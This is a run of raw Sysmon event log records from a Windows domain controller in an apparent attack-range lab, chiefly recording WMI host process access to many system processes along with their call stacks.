16:53:44.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-98AA-00000000AD01}10664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-98AA-00000000AD01}10664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002238472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.295{05ADC7E1-6D98-603E-95AA-00000000AD01}6528\PSHost.132591776241568538.6528.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002238471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEE1549E0FCE056D6EDFD519D20F041E,SHA256=4116670EA3B62CE2F33DD896B16025EB56F471007D04D9998AD7A7020F75DC4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 